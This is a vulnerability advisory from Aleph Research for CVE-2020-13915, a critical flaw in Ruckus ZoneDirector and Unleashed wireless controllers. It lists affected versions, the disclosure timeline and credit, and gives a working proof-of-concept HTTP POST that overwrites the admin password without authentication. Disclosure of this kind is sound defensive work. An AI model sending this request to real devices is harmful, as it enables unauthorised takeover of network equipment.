Unauthenticated admin credentials overwrite

Aleph Research Advisory

Identifier

CVE-2020-13915

Severity

Critical

Product

- ZoneDirector - Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7

Technical Details

Insecure permissions in emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allow a remote attacker to overwrite admin credentials via an unauthenticated crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 248
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='/system'>
	<admin username="admin" x-password="NewPass!" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

Timeline

05-Feb-20
: Reported to Ruckus Product Security Team
15-Jun-20
: Patch
07-Jun-20
: CVE-2020-13915 assigned
05-Aug-20
: Public disclosure

Credit

waveburst of Aleph Research, HCL Software